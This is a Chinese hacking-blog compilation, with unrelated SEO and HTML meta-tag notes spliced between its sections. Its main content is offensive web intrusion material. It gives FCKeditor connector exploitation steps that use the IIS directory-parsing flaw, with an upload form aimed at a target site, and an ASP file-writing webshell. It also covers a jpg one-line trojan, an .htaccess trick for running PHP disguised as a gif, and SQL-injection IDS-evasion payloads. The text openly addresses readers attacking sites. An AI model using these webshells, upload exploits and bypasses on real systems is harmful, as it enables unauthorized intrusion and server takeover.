Fckeditor的版本外部提交

首先,你得确定下Fckeditor的版本。

//editor/dialog/fck_about.html

其次,你确定下以下几个上传页面是否真的被删除了呢?

/FCKeditor/editor/filemanager/browser/default/browser.html

/FCKeditor/editor/filemanager/browser/default/connectors/test.html

/FCKeditor/editor/filemanager/upload/test.html

/FCKeditor/editor/filemanager/connectors/test.html

/FCKeditor/editor/filemanager/connectors/uploadtest.html

嗯,好吧,都已经删除了,真是太倒霉了,怎么办,确认下这些文件有哪个存在的么

/fckeditor/editor/filemanager/connectors/aspx/connector.aspx

/fckeditor/editor/filemanager/connectors/asp/connector.asp

/fckeditor/editor/filemanager/connectors/php/connector.php

如果存在,那太好了,你可以继续看下去了,我这里以aspx的为例

1.查看Media目录下的文件:

/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Media&CurrentFolder=%2F

红色Media可以更改为File或者image,相应的进入文件或者图片目录下

2.利用iis解析漏洞创建1.asp特殊目录

fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Media&CurrentFolder=%2F&NewFolderName=1.asp

红色的是对应的Media目录,蓝色的是特殊目录名字

3.构建表单,上传webshell到特殊目录

<form id=”frmUpload” enctype=”multipart/form-data” action=”http://www.itatpro.com/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=FileUpload&Type=Media&CurrentFolder=%2Fasp.asp” method=”post”>

Upload a new file:<br>

<input type=”file” name=”NewFile” size=”50″><br>

<input id=”btnUpload” type=”submit” value=”Upload”>

</form>

将以上代表保存为HTML格式,http://www.xxx.com修改成你入侵的网站地址,Type=Media是对应的Media目录,1.asp为特殊目录名。

最后的一些提示

上传之后的路径需要你在上传表单里面的代码里找,当然,他的呈现方式是一个上传好了的文件名,全路径必须你自己组合,我相信你是会的。如果访问之后发现无法访问,试着上传一张正确的图片,再进行访问,如果访问成功,说明管理员已经补上了IIS路径解析漏洞,那你得另找出路了。

转载:fckeditor漏洞再次突破影响版本asp,aspx

经测试,此方法通杀asp、aspx版本,不适用于php。
之前很多的方法,诸如上传*.asp等类型文件;创建*.asp等目录……
今天遇到一个fck编辑器,跟之前很多次一样,以上方法均无果。
创建*.asp;*.php等目录无果;上传*.asp;.jpg等文件无果;神马cer之类的就不说了。
以下是误打误撞的方法,不知道黑扩们发了没。
利用过程:
1、Current Folder处填写*.asp等目录文件,随便填即可;点击Create Folder创建目录;目录名随便填。

2、上传jpg格式的一句话木马。

3、利用完毕,直接访问一句话木马地址即可,菜刀链接。

外贸SEO优化的外链上链接总结

经过之前的几个网站测试,发现引擎是根据你链接的词来定位你的关键字排名的。你的友链都链接到那个页面,那么被链接的页面权重也就很高,排名也很不错。

如:一个网站定义关键字为企业SEO。那么如果它外链只链接企业SEO。往往引擎是不那轻易让它获得排名的。那么我们就要投放一个链接大关键词的外链。这样一来引擎就知道你的链接方向。当你的大关键字词做了一定程度以后,还是没什么排名或者订单。那么你就需要定位关键字类型了。继续投放一些长尾词,这样一来,长尾词就有可能获得不错的排名哦。

今天文章记录到着,下期讨论话题: 如果在一个页面投放N个以上自己网站的链接来获取排名

SA注射点找不到目录,你还可以这样。

type  c:\windows\system32\inetsrv\MetaBase.xml // 直接读IIS配置文件,你懂得。

select 1 where 1=(select top 1 physical_device_name  from msdb..backupmediafamily order by media_set_id desc) -  // 查询备份是否成功,一般在不知道目录情况下有效果。如替换SU 或者启动项等。

如果值不是你备份的路径,表示备份失败。

BS小马

<%
On Error Resume Next
set gl=server.CreateObJeCt(“Adodb.Stream”)
gl.Open
gl.Type=2
gl.CharSet=”gb2312″
gl.writetext request(“code”)
gl.SaveToFile server.mappath(request(“path”)),2
gl.Close
set gl=nothing
response.redirect request(“path”)
%>
用法:?code=xxx&path=x.asp

 

转载:HTML文档标签的详解

HTML文档中小meta的大作用
       meta是用来在HTML文档中模拟HTTP协议的响应头报文。meta 标签用于网页的<head>与</head>中,meta 标签的用处很多。meta 的属性有两种:name和http-equiv。name属性主要用于描述网页,对应于content(网页内容),以便于搜索引擎机器人查找、分类(目 前几乎所有的搜索引擎都使用网上机器人自动查找meta值来给网页分类)。这其中最重要的是description(站点在搜索引擎上的描述)和 keywords(分类关键词),所以应该给每页加一个meta值。比较常用的有以下几个:
name 属性
<meta name=”Generator” contect=”">用以说明生成工具(如Microsoft FrontPage 4.0)等;
               <meta name=”KEYWords” contect=”">向搜索引擎说明你的网页的关键词;
               <meta name=”DEscription” contect=”">告诉搜索引擎你的站点的主要内容;
               <meta name=”Author” contect=”你的姓名”>告诉搜索引擎你的站点的制作的作者;
               <meta name=”Robots” contect=”all|none|index|noindex|follow|nofollow”>
其中的属性说明如下:
设定为all:文件将被检索,且页面上的链接可以被查询;
                 设定为none:文件将不被检索,且页面上的链接不可以被查询;
                 设定为index:文件将被检索;
                 设定为follow:页面上的链接可以被查询;
                 设定为noindex:文件将不被检索,但页面上的链接可以被查询;
                 设定为nofollow:文件将不被检索,页面上的链接可以被查询。
http-equiv属性
<meta http-equiv=”Content-Type” contect=”text/html”;charset=gb_2312-80″><meta http-equiv=”Content-Language” contect=”zh-CN”>用以说明主页制作所使用的文字以及语言;又如英文是ISO-8859-1字符集,还有BIG5、utf-8、shift-Jis、Euc、Koi8-2等字符集;
<meta http-equiv=”Refresh” contect=”n;url=http://yourlink” >定时让网页在指定的时间n内,跳转到页面;
<meta http-equiv=”Expires” contect=”Mon,12 May 2001 00:20:00 GMT”>可以用于设定网页的到期时间,一旦过期则必须到服务器上重新调用。需要注意的是必须使用GMT时间格式;
<meta http-equiv=”Pragma” contect=”no-cache”>是用于设定禁止浏览器从本地机的缓存中调阅页面内容,设定后一旦离开网页就无法从Cache中再调出;
<meta http-equiv=”set-cookie” contect=”Mon,12 May 2001 00:20:00 GMT”>cookie设定,如果网页过期,存盘的cookie将被删除。需要注意的也是必须使用GMT时间格式;
<meta http-equiv=”Pics-label” contect=”">网页等级评定,在IE的internet选项中有一项内容设置,可以防止浏览一些受限制的网站,而网站的限制级别就是通过meta属性来设置的;
<meta http-equiv=”windows-Target” contect=”_top”>强制页面在当前窗口中以独立页面显示,可以防止自己的网页被别人当作一个frame页调用;
<meta http-equiv=”Page-Enter” contect=”revealTrans(duration=10,transtion=50)”><meta http-equiv=”Page-Exit”contect=”revealTrans(duration=20,transtion=6)”>设定进入和离开页面时的特殊效果,这个功能即FrontPage中的“格式/网页过渡”,不过所加的页面不能够是一个frame页面。

一个htaccess文件安全隐患

代码内容:htaccess文件
<FilesMatch “_php.gif”>
SetHandler application/x-httpd-php
</FilesMatch>

2.实用编辑器上传htaccess文件.

/editor/filemanager/upload/test.html

FCKeditor/editor/filemanager/browser/default/connectors/test.html

3.上传shell.php.gif
4.上传后shell.php.gif, 会自动被改名为 shell_php.gif
5.访问上传目录/shell_php.gif

通过+号拆解字符串绕过

4、通过类型转换修饰符N绕过
可以说这是一个不错的想法,他除了能在某种程度上绕过限制,而且还有别的作用,大家自己好好想想吧。关于利用,

 
or ”swords” = N” swords”
 
,大写的N告诉mssql server 字符串作为nvarchar类型,它起到类型转换的作用,并不影响注射语句本身,但是可以避过基于知识的模式匹配IDS。
 
5、通过+号拆解字符串绕过
效果值得考证,但毕竟是一种方法。如
 
or ”swords” =‘sw” +” ords” ;EXEC(‘IN” +” SERT INTO ”+” …..” )
 
6、通过LIKE绕过
以前怎么就没想到呢?

 
or”swords” LIKE ”sw”
 
显然可以很轻松的绕过“=”“>”的限制……
 
7、通过IN绕过
与上面的LIKE的思路差不多,

 
or ”swords” IN (”swords”)
 
 
8、通过BETWEEN绕过

 
or ”swords” BETWEEN ”rw” AND ”tw”
 
9、通过>或者<绕过
 
or ”swords” > ”sw”
or ”swords” < ”tw”
or 1<3
……
 
10、运用注释语句绕过
用/**/代替空格,如:UNION /**/ Select /**/user,pwd,from tbluser
用/**/分割敏感词,如:U/**/ NION /**/ SE/**/ LECT /**/user,pwd from tbluser
 
11、用HEX绕过,一般的IDS都无法检测出来
 
0x730079007300610064006D0069006E00 =hex(sysadmin)
0x640062005F006F0077006E0065007200 =hex(db_owner)
 

PS:

以上相关技巧到现在都还是有效果的,部分方法在不同的网站程序中也都是通用的,大家可以灵活运用